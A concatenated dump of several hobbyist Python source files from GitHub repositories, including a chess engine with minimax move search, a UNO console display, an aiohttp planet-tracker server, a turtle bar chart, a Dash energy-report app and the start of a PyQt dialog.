Tile.in_range(move_row, move_col): #Check if the move is inside the board\n if self.tiles[move_row][move_col].is_empty_or_hostile(piece.color): #Check if the tile is empty or contains an enemy piece\n initial_tile = Tile(row, col)\n final_piece = self.tiles[move_row][move_col].piece\n final_tile = Tile(move_row, move_col, final_piece)\n move = Move(initial_tile, final_tile, piece, final_piece) #Create the new possible move\n if not checked: #Check if the move has already been checked\n if not self.in_check(piece, move): #Check if the move does not lead to a check situation\n piece.add_move(move) #Add it to the list\n else:\n break #If moving the knight lead to a check situation, it will be the case for all its possible moves, so we break here\n else:\n piece.add_move(move) #Add it to the list \n \n def line_moves(increments):\n \"\"\"\n All possible straight line moves that we'll use for the bishop, the rook and the queen\n \"\"\"\n for increment in increments:\n row_inc, col_inc = increment\n move_row = row + row_inc\n move_col = col + col_inc\n \n while True:\n if Tile.in_range(move_row, move_col): #Check if the move is inside the board\n initial_tile = Tile(row, col)\n enemy = self.tiles[move_row][move_col].piece\n final_tile = Tile(move_row, move_col, piece)\n move = Move(initial_tile, final_tile, piece, enemy) #Create new possible move\n \n if self.tiles[move_row][move_col].is_empty():\n if not checked: #Check if the move has already been checked\n if not self.in_check(piece, move): #Check if the move does not lead to a check situation\n piece.add_move(move) #Add it to the list\n else:\n piece.add_move(move) #Add it to the list\n \n elif self.tiles[move_row][move_col].has_hostile_piece(piece.color):\n if not checked: #Check if the move has already been 
checked\n if not self.in_check(piece, move): #Check if the move does not lead to a check situation\n piece.add_move(move) #Add it to the list\n else:\n piece.add_move(move) #Add it to the list \n break #Prevent to continue looping after reaching an enemy\n \n elif self.tiles[move_row][move_col].has_friendly_piece(piece.color):\n break #Prevent to continue looping behind an ally\n \n else:\n break\n \n move_row = move_row + row_inc\n move_col = move_col + col_inc\n \n def king_moves():\n \"\"\"\n All king pieces possibe moves\n \"\"\"\n adjacent_moves = [\n (row - 1, col), #Up move\n (row - 1, col + 1), #Up right move\n (row, col + 1), #Right move\n (row + 1, col + 1), #Down right move\n (row + 1, col), #Down move\n (row + 1, col - 1), #Down left move\n (row, col - 1), #Left move\n (row - 1, col - 1), #Up left move\n ]\n \n for adjacent_move in adjacent_moves:\n move_row, move_col = adjacent_move\n \n if Tile.in_range(move_row, move_col): #Check if the move is inside the board\n if self.tiles[move_row][move_col].is_empty_or_hostile(piece.color): #Check if the tile is empty or contains an enemy piece\n initial_tile = Tile(row, col)\n enemy = self.tiles[move_row][move_col].piece\n final_tile = Tile(move_row, move_col)\n move = Move(initial_tile, final_tile, piece, enemy) #Create de new possible move\n \n if not checked: #Check if the move has already been checked\n if not self.in_check(piece, move): #Check if the move does not lead to a check situation\n piece.add_move(move) #Add it to the list\n else:\n break\n else:\n piece.add_move(move) #Add it to the list \n \n if not piece.moved: #Checking if the king has not move yet\n ##Queen Castling\n left_rook = self.tiles[row][0].piece #Get the piece on the far left of the king\n if isinstance(left_rook, Rook): #Check if this piece is a rook\n if not left_rook.moved: #Check if the rook has not move yet\n for column in range(1,4): #Loop the tiles between the rook and the king\n if self.tiles[row][column].has_piece(): #Check if there is a piece on the tile\n break #break because there is an obstacle between the rook and the king\n \n elif column == 3:\n piece.left_rook = left_rook #Add a reference to the rook\n \n ###Rook move\n initial_tile = Tile(row, 0) #Set the rook initial tile\n final_tile = Tile(row, 3) #Set the rook destination tile\n rook_move = Move(initial_tile, final_tile, left_rook) #Create the new move\n \n ###King move\n initial_tile = Tile(row, col) #Set the king initial tile\n final_tile = Tile(row, 2) #Set the king destination tile\n king_move = Move(initial_tile, final_tile, piece) #Create the new move\n \n if not checked: #Check if the move has already been checked\n if not self.in_check(piece, king_move) and not self.in_check(left_rook, rook_move): #Check if the moves does not lead to a check situation\n piece.add_move(king_move) #Add the king move to its list\n left_rook.add_move(rook_move) #Add the rook move to its list\n else:\n piece.add_move(king_move) #Add it to the list\n left_rook.add_move(rook_move) #Add the rook move to its list \n \n ##King castling\n right_rook = self.tiles[row][7].piece #Get the piece on the far right of the king\n if isinstance(right_rook, Rook): #Check if this piece is a rook\n if not right_rook.moved: #Check if the rook has not move yet\n for column in range(5,7): #Loop the tiles between the rook and the king\n if self.tiles[row][column].has_piece(): #Check if there is a piece on the tile\n break #break because there is an obstacle between the rook and the king\n \n elif column == 6:\n 
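# hedged aside (not from the original author): a complete castling-legality check would also verify that the king is not currently in check and does not cross an attacked square (here, columns 4-6 for the king-side castle); a hypothetical helper such as square_attacked(row, col, color) could express that test.\n                            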
piece.right_rook = right_rook #Add a reference to the rook\n \n ###Rook move\n initial_tile = Tile(row, 7) #Set the rook initial tile\n final_tile = Tile(row, 5) #Set the rook destination tile\n rook_move = Move(initial_tile, final_tile, right_rook) #Create the new move\n \n ###King move\n initial_tile = Tile(row, col) #Set the king initial tile\n final_tile = Tile(row, 6) #Set the king destination tile\n king_move = Move(initial_tile, final_tile, piece) #Create the new move\n \n if not checked: #Check if the move has already been checked\n if not self.in_check(piece, king_move) and not self.in_check(right_rook, rook_move): #Check if the moves does not lead to a check situation\n piece.add_move(king_move) #Add the king move to its list\n right_rook.add_move(rook_move) #Add the rook move to its list\n else:\n piece.add_move(king_move) #Add it to the list\n right_rook.add_move(rook_move) #Add the rook move to its list\n \n piece.moves = []\n \n if isinstance(piece, Pawn):\n pawn_moves()\n \n elif isinstance(piece, Knight):\n knight_moves()\n \n elif isinstance(piece, Bishop):\n line_moves([\n (1, 1), #down right direction\n (1, -1), #down left direction\n (-1, 1), #up right direction\n (-1, -1) #up left direction\n ])\n \n elif isinstance(piece, Rook):\n line_moves([\n (1, 0), #down direction\n (0, 1), #right direction\n (-1, 0), #up direction\n (0, -1) #left direction\n ])\n \n elif isinstance(piece, Queen):\n line_moves([\n (1, 1), #down right direction\n (1, -1), #down left direction\n (-1, 1), #up right direction\n (-1, -1), #up left direction\n (1, 0), #down direction\n (0, 1), #right direction\n (-1, 0), #up direction\n (0, -1) #left direction\n ])\n \n elif isinstance(piece, King):\n king_moves()\n \n def move(self, piece, move, testing=False):\n \"\"\"\n Moving a piece on the board\n \"\"\"\n initial_tile = move.initial_tile\n final_tile = move.final_tile\n \n empty_en_passant = self.tiles[final_tile.col][final_tile.row].is_empty()\n \n self.tiles[initial_tile.col][initial_tile.row].piece = None #Clear the initial tile\n destination_tile = self.tiles[final_tile.col][final_tile.row]\n destination_tile.piece = piece #Set the piece on his destination tile\n self.move_log.append(move)\n \n if isinstance(piece, Pawn): #Check if the piece is a pawn\n ##Pawn promotion\n self.pawn_promotion(piece, move) #Promote the pawn to Queen\n \n ##Pawn en passant\n difference = final_tile.row - initial_tile.row\n if difference != 0 and empty_en_passant: #Check if the pawn captured an enemy pawn (diagonal move) and if the tile is empty\n destination_tile = self.tiles[initial_tile.col][initial_tile.row + difference].piece\n move.captured_piece = destination_tile\n self.tiles[initial_tile.col][initial_tile.row + difference].piece = None #Clear the initial tile\n self.tiles[final_tile.col][final_tile.row].piece = piece #Set the piece on his destination tile\n piece.did_en_passant = True\n piece.did_en_passant_move = move\n \n ##King and Queen castling\n if isinstance(piece, King): #Check if the piece is the king\n if self.castling(initial_tile, final_tile) and not testing: #Check if we are castling\n difference = final_tile.row - initial_tile.row #Check which castling is done (king or queen castling)\n if difference < 0:\n rook = piece.left_rook\n else:\n rook = piece.right_rook\n rook_move = rook.moves[-1]\n self.move(rook, rook_move) #Move the rook with its last possible move (that we just added to the list on the king_moves() function)\n self.move_log.append(move)\n \n piece.moved = True #Set the piece 
in the \"already moved\" state\n piece.castled = True\n piece.castling_move = move\n piece.clear_moves() #Clear the list of possible moves as the piece position has changed\n self.last_move = move #Saving the move as the last piece move\n \n def undo_move(self):\n if len(self.move_log) != 0: #Check if there is a last move\n move = self.move_log.pop() #Get the last move and delete it from the list\n moved_piece = move.moved_piece\n captured_piece = move.captured_piece\n #Reverse the move\n self.tiles[move.initial_tile.col][move.initial_tile.row].piece = moved_piece\n moved_piece.moved = False\n if isinstance(moved_piece, Queen): #Check if the piece is a Queen\n if moved_piece.promoted: #Check if the Queen is a promoted Pawn\n if move == moved_piece.promotion_move:\n self.tiles[move.initial_tile.col][move.initial_tile.row].piece = Pawn(moved_piece.color) #Cancel the pawn promotion\n \n self.tiles[move.final_tile.col][move.final_tile.row].piece = captured_piece\n \n if isinstance(moved_piece, King): #Check if the piece is a Rook\n if moved_piece.castled: #Check if the rook was castled\n if move == moved_piece.castling_move:\n self.undo_move()\n moved_piece.castled = False\n moved_piece.castling_move = []\n elif isinstance(moved_piece, Pawn):\n if moved_piece.did_en_passant:\n if moved_piece.did_en_passant_move == move:\n difference = move.initial_tile.row - move.final_tile.row\n # self.tiles[move.final_tile.col][move.initial_tile.row - difference].piece = captured_piece\n moved_piece.did_en_passant = False\n moved_piece.did_en_passant_move = []\n \n def valid_move(self, piece, move):\n \"\"\"\n return all possible moves of the piece in the current position\n \"\"\"\n return move in piece.moves\n \n def get_all_valid_moves(self, game):\n valid_moves = []\n for row in range(ROWS):\n for col in range(COLS):\n piece = self.tiles[row][col].piece\n if piece != None and piece.color == game.next_player:\n self.possible_moves(piece, row, col)\n if piece.moves != None:\n for move in piece.moves:\n valid_moves.append(move)\n return valid_moves\n \n def pawn_promotion(self, piece, move):\n \"\"\"\n Promote pawn that reached his opponent backline\n \"\"\"\n if move.final_tile.col == 0 or move.final_tile.col == 7: #Check if the pawn is on either one of the backlines\n self.tiles[move.final_tile.col][move.final_tile.row].piece = Queen(piece.color) #Replace the pawn by a new Queen\n piece = self.tiles[move.final_tile.col][move.final_tile.row].piece\n piece.promoted = True\n piece.promotion_move = move\n \n def castling(self, initial_tile, final_tile):\n \"\"\"\n Check if the king is castling\n \"\"\"\n return abs(initial_tile.row - final_tile.row) == 2\n \n def in_check(self, piece, move):\n \"\"\"\n Check if there is a check situation\n \"\"\"\n temp_board = copy.deepcopy(self) #Create a temporary copy of the board\n temp_piece = copy.deepcopy(piece) #Create a temporary copy of the piece\n temp_board.move(temp_piece, move, testing=True) #Move the piece\n \n for row in range(ROWS):\n for col in range(COLS):\n if temp_board.tiles[row][col].has_hostile_piece(piece.color): #Check if there is an enemy piece\n enemy = temp_board.tiles[row][col].piece #Get the enemy piece\n temp_board.possible_moves(enemy, row, col, checked=True) #Get all possible moves of the enemy piece\n for possible_move in enemy.moves: #Loop for each possible moves\n if isinstance(possible_move.final_tile.piece, King): #Check if there is the oponent king on the final tile\n return True #Return that there is a check situation\n return False 
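#(aside: each in_check call deep-copies the entire board per candidate move; caching the enemy's attacked squares once per ply would avoid the repeated copies) 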
#Return that there is no check situation\n \n def set_en_passant(self, piece):\n \"\"\"\n Enable the en passant attribut\n \"\"\"\n if not isinstance(piece, Pawn): #Check if the piece is not a Pawn\n return\n \n for row in range(ROWS):\n for col in range(COLS):\n if isinstance(self.tiles[row][col].piece, Pawn):\n self.tiles[row][col].piece.en_passant = False\n \n piece.en_passant = True\n \n def ai_random_move(self, valid_moves):\n \"\"\"\n Return a random move among all possible moves of the current state of the game\n \"\"\"\n return valid_moves[random.randint(0, len(valid_moves) - 1)] \n \n def ai_best_minimax_move(self, depth, game, is_maximizing):\n \"\"\"\n Returns the optimal move in the current game state\n This function is also the first iteration of the minimax algorithm (calls the recursive \"minimax\" function)\n Replaced by \"ai_best_negamax_move\" function\n \"\"\"\n print(\"The AI is thinking...\")\n board = copy.deepcopy(self)\n valid_moves = board.get_all_valid_moves(game)\n optimal_move = None\n \n if valid_moves == None:\n return None\n elif is_maximizing:\n max_value = -CHECKMATE\n \n for move in valid_moves:\n piece = copy.deepcopy(self.tiles[move.initial_tile.col][move.initial_tile.row].piece)\n if piece != None:\n board.move(piece, move)\n value = board.minimax(depth - 1, game, -CHECKMATE, CHECKMATE, not is_maximizing)\n if value > max_value:\n max_value = value\n optimal_move = move\n return optimal_move\n else:\n min_value = CHECKMATE\n for move in valid_moves:\n piece = copy.deepcopy(self.tiles[move.initial_tile.col][move.initial_tile.row].piece)\n if piece != None:\n board.move(piece, move)\n value = board.minimax(depth - 1, game, -CHECKMATE, CHECKMATE, not is_maximizing)\n if value < min_value:\n min_value = value\n optimal_move = move\n return optimal_move\n \n def minimax(self, depth, game, alpha, beta, is_maximizing):\n \"\"\"\n Recursive function that returns the optimal move in the current situation\n Replaced by \"negamax\" function\n \"\"\"\n if depth == 0:\n return self.evaluate_board()\n \n valid_moves = self.get_all_valid_moves(game)\n if is_maximizing:\n if valid_moves == None:\n return -CHECKMATE\n max_value = -CHECKMATE\n for move in valid_moves:\n piece = self.tiles[move.initial_tile.col][move.initial_tile.row].piece\n if piece != None:\n self.move(piece, move)\n value = max(max_value, self.minimax(depth - 1, game, alpha, beta, False))\n if value > max_value:\n max_value = value\n \n if max_value > alpha: #Pruning\n alpha = max_value\n if alpha >= beta:\n break\n return max_value\n else:\n if valid_moves == None:\n return CHECKMATE\n min_value = CHECKMATE\n for move in valid_moves:\n piece = self.tiles[move.initial_tile.col][move.initial_tile.row].piece\n if piece != None:\n self.move(piece, move)\n value = min(min_value, self.minimax(depth - 1, game, alpha, beta, True))\n if value < min_value:\n min_value = value\n \n if min_value < beta: #Pruning\n beta = min_value\n if beta >= alpha:\n break\n return min_value\n\n def ai_best_negamax_move(self, game):\n \"\"\"\n Returns the optimal move in the current game state\n This function is also the first iteration of the negamax algorithm (calls the recursive \"negamax\" function)\n \"\"\"\n print(\"The AI is thinking...\")\n global optimal_move\n global count\n count = 0\n board = copy.deepcopy(self)\n valid_moves = board.get_all_valid_moves(game)\n optimal_move = None\n board.negamax(valid_moves, DEPTH, game, -CHECKMATE, CHECKMATE, 1 if game.next_player == 'white' else -1)\n print(\"iteration = \" + 
str(count))\n return optimal_move\n\n def negamax(self, valid_moves, depth, game, alpha, beta, turn_multiplier):\n \"\"\"\n Recursive function that combines the two parts of the minimax algorithm (combines the maximizing and the minimizing parts in one)\n \"\"\"\n global optimal_move\n global count\n count += 1\n if depth == 0:\n return self.evaluate_board() * turn_multiplier\n \n max_value = -CHECKMATE\n for move in valid_moves:\n piece = self.tiles[move.initial_tile.col][move.initial_tile.row].piece\n if piece != None:\n self.move(piece, move)\n valid_moves = self.get_all_valid_moves(game)\n value = -self.negamax(valid_moves, depth - 1, game, -beta, -alpha, -turn_multiplier)\n\n if value > max_value:\n max_value = value\n if depth == DEPTH:\n optimal_move = move\n self.undo_move()\n if max_value > alpha: #Pruning\n alpha = max_value\n\n if alpha >= beta:\n break\n return max_value\n \n def evaluate_board(self):\n \"\"\"\n Evaluate the board state : returns a positive value if white is in advance and a negative one if black is\n The score depend on the positions of the pieces and the material advantage\n \"\"\"\n # A piece with more move choices will be prefered as others:\n # | wR wN wB wQ wK wB wN wR |\n # | wP wP wP wP wP wP wP wP |\n # | __ __ __ __ __ __ __ __ |\n # | __ __ __ __ __ __ __ __ |\n # | __ __ __ __ __ __ __ __ |\n # | __ __ __ __ __ P1 __ P2 | P1 is prefered because he has more possible moves for next turns\n # | bP bP bP bP bP bP bP bP |\n # | bR bN bB bQ bK bB __ bR |\n\n score = 0\n for row in range(ROWS):\n for col in range(COLS):\n piece = self.tiles[row][col].piece\n if piece != None:\n color = piece.color\n position_score = 0\n #To improve the AI, we will weight the score based on the position of the pieces\n if isinstance(piece, Knight):\n position_score = piece_position_score[\"N\"][row][col]\n elif isinstance(piece, Bishop):\n position_score = piece_position_score[\"B\"][row][col]\n elif isinstance(piece, Queen):\n position_score = piece_position_score[\"Q\"][row][col]\n elif isinstance(piece, Rook):\n position_score = piece_position_score[\"R\"][row][col]\n elif isinstance(piece, Pawn):\n position_score = piece_position_score[\"wP\"][row][col] if color == 'white' else piece_position_score[\"bP\"][row][col]\n \n if color == 'white':\n score += piece.value + position_score * .3\n else:\n score -= piece.value + position_score * .3\n return score\n \n def print_board(self):\n \"\"\"\n Print the board in the console (for debug purpose)\n \"\"\"\n for row in range(ROWS):\n pcol = \"| \"\n for col in range(COLS):\n piece = self.tiles[row][col].piece\n if piece == None:\n pcol += \"__ \"\n elif piece.color == 'white':\n if isinstance(piece, Pawn):\n pcol += \"wP \"\n elif isinstance(piece, Bishop):\n pcol += \"wB \"\n elif isinstance(piece, Knight):\n pcol += \"wN \"\n elif isinstance(piece, Rook):\n pcol += \"wR \"\n elif isinstance(piece, Queen):\n pcol += \"wQ \"\n elif isinstance(piece, King):\n pcol += \"wK \"\n else:\n if isinstance(piece, Pawn):\n pcol += \"bP \"\n elif isinstance(piece, Bishop):\n pcol += \"bB \"\n elif isinstance(piece, Knight):\n pcol += \"bN \"\n elif isinstance(piece, Rook):\n pcol += \"bR \"\n elif isinstance(piece, Queen):\n pcol += \"bQ \"\n elif isinstance(piece, King):\n pcol += \"bK \"\n pcol += \"|\"\n print(pcol)\n 
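# usage sketch (hypothetical instance name): board.print_board() renders rows like '| bR bN bB bQ bK bB bN bR |'\n        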
print(\"\\n\\n\")","repo_name":"Uragoo/AI_CHESS_GAME","sub_path":"src/board.py","file_name":"board.py","file_ext":"py","file_size_in_byte":34910,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"26794367149","text":"from tool.runners.python import SubmissionPy\nimport string\nfrom functools import reduce\n\ntype_to_priority_map = {\n **{c: i+1 for i, c in enumerate(string.ascii_lowercase)},\n **{c: i+27 for i, c in enumerate(string.ascii_uppercase)}\n}\n\ndef priority(group: str) -> int:\n badge_type = (set(group[0]) & set(group[1]) & set(group[2])).pop()\n return type_to_priority_map[badge_type]\n\nclass SilvestreSubmission(SubmissionPy):\n def run(self, s):\n \"\"\"\n :param s: input in string format\n :return: solution flag\n \"\"\"\n lines = s.split(\"\\n\")\n return sum(priority(lines[n:n+3]) for n in range(0, len(lines), 3))\n\n\ndef test_silvestre():\n \"\"\"\n Run `python -m pytest ./day-03/part-2\\silvestre.py` to test the submission.\n \"\"\"\n assert (\n SilvestreSubmission().run(\n \"\"\"\n\"\"\".strip()\n )\n == None\n )\n","repo_name":"badouralix/adventofcode-2022","sub_path":"day-03/part-2/silvestre.py","file_name":"silvestre.py","file_ext":"py","file_size_in_byte":883,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"31"} +{"seq_id":"8866603909","text":"import os\nfrom EnumsCards import *\n\n\ndef showToDrawnCards(drawCards):\n print(\"+Cards: \" + str(drawCards[0]) + \"\\t\", end=\"\")\n\n\ndef showDirection(direction):\n if(direction == 1):\n print(\"Direction: Clockwise\\t\", end=\"\")\n else:\n print(\"Direction C-Clockwise\\t\", end=\"\")\n\n\ndef showHand(hand):\n whichCard = 0\n for card in hand:\n print(\"\" + str(card.getValue()) + \" \" +\n str(card.getColor()) + \" \\t\\t\\t->\\t \" + str(whichCard))\n whichCard += 1\n\n\ndef showOptions(hand):\n print()\n print(\"Pass -> P\")\n print(\"Draw Card(s) -> D\")\n if(len(hand) == 2):\n print(\"UNO! 
-> U\")\n\n\ndef showCurrentScreen(hand, direction, lastCard, playerName, drawCards):\n    clearScreen()\n    showPlayerName(playerName)\n    showDirection(direction)\n    showToDrawnCards(drawCards)\n    showLastCard(lastCard)\n    showHand(hand)\n    showOptions(hand)\n\n\ndef showPlayerName(playerName):\n    print(\"Name: \" + playerName + \"\\t\", end=\"\")\n\n\ndef showLastCard(lastCard):\n    print(\"Last Card: \" + str(lastCard.getValue()) +\n          \" \" + str(lastCard.getColor()))\n\n\ndef clearScreen():\n    os.system(\"cls\" if os.name == \"nt\" else \"clear\")\n\n\ndef showChooseColorScreen(startMessage, hand, direction, lastCard, playerName, drawCards):\n    clearScreen()\n    showPlayerName(playerName)\n    showDirection(direction)\n    showToDrawnCards(drawCards)\n    showLastCard(lastCard)\n    showHand(hand)\n    print(startMessage)\n    print(\"Choose a new color:\")\n    print(\"blue\\t->\\tb\")\n    print(\"red\\t->\\tr\")\n    print(\"yellow\\t->\\ty\")\n    print(\"green\\t->\\tg\")\n    newColor = input().lower()\n    if(newColor == \"b\"):\n        return 0\n    elif(newColor == \"r\"):\n        return 1\n    elif(newColor == \"y\"):\n        return 2\n    elif(newColor == \"g\"):\n        return 3\n    else:\n        #pass the full context through; the bare recursive call raised a TypeError on invalid input\n        return showChooseColorScreen(\"Not a color!\", hand, direction, lastCard, playerName, drawCards)\n\n\ndef showPointsOfPlayers(pointsOfPlayers, names):\n    i = 0\n    for points in pointsOfPlayers:\n        print(\"Points of \" + names[i] + \": \" + str(pointsOfPlayers[i]))\n        i += 1\n","repo_name":"NWuensche/UNOinPython","sub_path":"CurrentScreen.py","file_name":"CurrentScreen.py","file_ext":"py","file_size_in_byte":2028,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"31"} +{"seq_id":"37546401970","text":"from planet_tracker import PlanetTracker\r\nfrom aiohttp import web\r\n\r\nimport asyncio\r\n\r\n\r\n__all__ = [\"app\"]\r\n\r\n\r\nroutes = web.RouteTableDef()\r\n\r\n\r\n# Testing route: http://localhost:8000/\r\n@routes.get('/')\r\nasync def hello(request):\r\n    return web.FileResponse(\"./planet_tracker_index.html\")\r\n\r\n\r\n# Testing route: http://localhost:8000/planets/mars?long=145.05&lat=-39.754&elevation=0\r\n@routes.get(\"/planets/{name}\")\r\nasync def get_planet_ephmeris(request):\r\n\tplanet_name = request.match_info['name']\r\n\tdata = request.query\r\n\tgeo_location_data = {}\r\n\ttry:\r\n\t\tgeo_location_data = {\r\n\t\t\t'long': str(data['long']),\r\n\t\t\t'lat': str(data['lat']),\r\n\t\t\t'elevation': float(data['elevation'])\r\n\t\t}\r\n\texcept KeyError as err:\r\n\t\tgeo_location_data = {\r\n\t\t\t'long': '-0.0005',\r\n\t\t\t'lat': '51.4769',\r\n\t\t\t'elevation': 0.0\r\n\t\t}\r\n\r\n\tplanet_tracker = PlanetTracker()\r\n\tplanet_tracker.lat = geo_location_data['lat']\r\n\tplanet_tracker.long = geo_location_data['long']\r\n\tplanet_tracker.elevation = geo_location_data['elevation']\r\n\tplanet_data = planet_tracker.calc_planet(planet_name)\r\n\r\n\treturn web.json_response(planet_data)\r\n\r\n\r\napp = web.Application()\r\napp.add_routes(routes)\r\n\r\n# Serving \"static\" assets like CSS and JavaScript - discouraged - just for testing\r\napp.router.add_static('/', './')\r\n\r\n# The web.run_app function runs our app in a blocking manner - non concurrent\r\n# web.run_app(app, host=\"localhost\", port=8000)\r\n\r\n\r\n# For concurrent run :\r\n# run_app() provides a simple blocking API for running an Application.\r\n# For starting the application asynchronously or serving on multiple HOST/PORT, AppRunner exists\r\nasync def start_async_app():\r\n    runner = web.AppRunner(app)\r\n    await runner.setup()\r\n    site = web.TCPSite(runner, \"localhost\", 8000)\r\n    await 
site.start()\r\n return runner, site\r\n\r\nloop = asyncio.get_event_loop()\r\nrunner, site = loop.run_until_complete(start_async_app())\r\n\r\n# To stop serving, call AppRunner.cleanup()\r\ntry:\r\n loop.run_forever()\r\nexcept KeyboardInterrupt as err:\r\n loop.run_until_complete(runner.cleanup())","repo_name":"GitTeaching/concurrency_parallelism_asyncio","sub_path":"asyncio_snippets/planet_tracker_aiohttpapp.py","file_name":"planet_tracker_aiohttpapp.py","file_ext":"py","file_size_in_byte":2043,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"25878185262","text":"# 6.11 Turtle Bar Chart\n'''\nWe can quickly see that drawing a bar will be similar to\ndrawing a rectangle or a square. Since we will need to do it\na number of times, it makes sense to create a function,\ndrawBar, that will need a turtle and the height of the bar.\nWe will assume that the width of the bar will be 40 units.\nOnce we have the function, we can use a basic for loop to\nprocess the list of data values.\n'''\nimport turtle\n\ndef drawBar(t, height):\n \"\"\" Get turtle t to draw one bar, of height. \"\"\"\n t.begin_fill() # start filling this shape\n t.left(90)\n t.forward(height)\n t.write(str(height))\n t.right(90)\n t.forward(40)\n t.right(90)\n t.forward(height)\n t.left(90)\n t.end_fill() # stop filling this shape\n\n\nxs = [33, 27, 8, 99, 34, 23, 18] # here is the data\nmaxheight = max(xs)\nnumbars = len(xs)\nborder = 10\n\nwn = turtle.Screen() # Set up the window and its attributes\nwn.setworldcoordinates(0-border, 0-border, 40*numbars+border, maxheight+border)\nwn.bgcolor(\"lightgreen\")\n\ntess = turtle.Turtle() # create tess and set some attributes\ntess.color(\"blue\")\ntess.fillcolor(\"red\")\ntess.pensize(3)\n\n\nfor a in xs:\n drawBar(tess, a)\n\nwn.exitonclick()","repo_name":"KenjaminButton/runestone_thinkcspy","sub_path":"6_functions/6.11.turtle_bar_chart.py","file_name":"6.11.turtle_bar_chart.py","file_ext":"py","file_size_in_byte":1188,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"24070144801","text":"import pandas as pd\nfrom dash import Dash, html, dcc, callback, Output, Input\nimport plotly.express as px\n\nimport openai\nimport time\n\n\ndef CallDash(sector):\n openai.api_key = 'xxxxxxxx'\n\n messages = [{\"role\": \"system\", \"content\":\n \"I want you to act as a data science instructor. You will explain energy consumption data as an expert.\"}]\n\n def ChatRun(message):\n messages.append(\n {\"role\": \"user\", \"content\": message},\n )\n chat = openai.ChatCompletion.create(\n model=\"gpt-3.5-turbo-16k\", messages=messages\n )\n reply = chat.choices[0].message.content\n messages.pop()\n return reply\n\n def PromptEng():\n ChatRun(\"you are a python developer\")\n time.sleep(20)\n ChatRun(\"when I ask you any code related questions, only output the code, without any text.\")\n time.sleep(20)\n ChatRun(\"Dont include any text in your answer, only the code\")\n time.sleep(20)\n ChatRun(\"When I ask further questions, do it like the last response. 
No explanation, only the code\")\n time.sleep(20)\n ChatRun(\"no text at the end, only the code\")\n\n xls = pd.ExcelFile('./ECUK_2022_Consumption_tables_27102022_cleaned.xlsx')\n sheet_names = xls.sheet_names\n all_sheets_data = {}\n for sheet in sheet_names:\n all_sheets_data[sheet] = pd.read_excel(xls, sheet)\n\n df = all_sheets_data['Table C1']\n labels = df.isna().all(axis=0).cumsum()\n grouped = df.groupby(labels, axis=1)\n small_dataframes = []\n for _, group in grouped:\n small_df = group.dropna(axis=1, how='all')\n small_dataframes.append(small_df)\n\n PlotDict = {}\n for i in range(len(small_dataframes)):\n key = f\"{small_dataframes[i].iloc[-1][0]}\"\n value = small_dataframes[i]\n PlotDict[key] = value\n #print(PlotDict)\n\n df_plot = PlotDict[sector]\n response = ChatRun(f\"Please write a report based on the following dataframe. The unit of the data is thousand tonnes of oil equivalen.\\\n The dataframe is about Energy Consumption in {sector} in the UK from 1970-2021. \\\n The report should summerise the content, show the trends, do comparisions, and give conclusion and future outlook at the end. \\\n The report should be less than 300 words. Don't show the title of the report. Make sure each statement is supported by data and numbers. \\\n I know the data are from the past and may not be useful to predict the future, so don't say it in the report. The dataframe is:\"+str(df_plot))\n\n app = Dash(__name__)\n\n\n # Layout of the Dash application\n\n app.layout = html.Div([\n html.H1(children=f'UK Final Energy Consumption by sector and fuel 1970-2021 - {sector} | Unit: Thousand tonnes of oil equivalent', style={'textAlign':'center'}),\n dcc.Dropdown(df_plot.columns[1:], 'Coal', id='dropdown-selection'),\n dcc.Graph(id='graph-content'),\n dcc.Textarea(\n id='textarea-example',\n value=str(response),\n style={'width': '100%', 'height': 300},\n )\n ])\n\n @callback(\n Output('graph-content', 'figure'),\n Input('dropdown-selection', 'value')\n )\n def update_graph(value):\n return px.line(df_plot, x=df_plot.columns[0], y=str(value))\n\n ##if __name__ == '__main__':\n app.run(debug=False)\n\n#CallDash('Domestic')","repo_name":"Aska0526/ibm-datathon","sub_path":"script/content.py","file_name":"content.py","file_ext":"py","file_size_in_byte":3361,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"28010564570","text":"from PyQt5 import QtCore, QtGui, QtWidgets\nfrom .klient import Osoba,Firma\n\nclass Menu_klient(object):\n def __init__(self,system):\n self.system=system\n\n def setupUi(self, Dialog):\n\n Dialog.setObjectName(\"Klienci\")\n Dialog.resize(800, 600)\n Dialog.setStyleSheet(\"background-color: rgb(53, 53, 53);\")\n\n icon = QtGui.QIcon()\n icon.addPixmap(QtGui.QPixmap(\"modules/ikony/plane.png\"), QtGui.QIcon.Normal, QtGui.QIcon.Off)\n\n\n Dialog.setWindowIcon(icon)\n\n self.verticalLayout = QtWidgets.QVBoxLayout(Dialog)\n self.verticalLayout.setContentsMargins(9, 9, 9, 9)\n self.verticalLayout.setSpacing(6)\n self.verticalLayout.setObjectName(\"verticalLayout\")\n self.stackedWidget = QtWidgets.QStackedWidget(Dialog)\n self.stackedWidget.setObjectName(\"stackedWidget\")\n self.page = QtWidgets.QWidget()\n self.page.setObjectName(\"page\")\n self.verticalLayout_2 = QtWidgets.QVBoxLayout(self.page)\n self.verticalLayout_2.setContentsMargins(0, 0, 0, 0)\n self.verticalLayout_2.setSpacing(10)\n self.verticalLayout_2.setObjectName(\"verticalLayout_2\")\n self.zmien_na_firme = QtWidgets.QPushButton(self.page)\n 
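# (design aside) QtWidgets.QFormLayout would pair each label with its line edit automatically; the QVBoxLayout used here depends on manual insertion order instead.\n        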
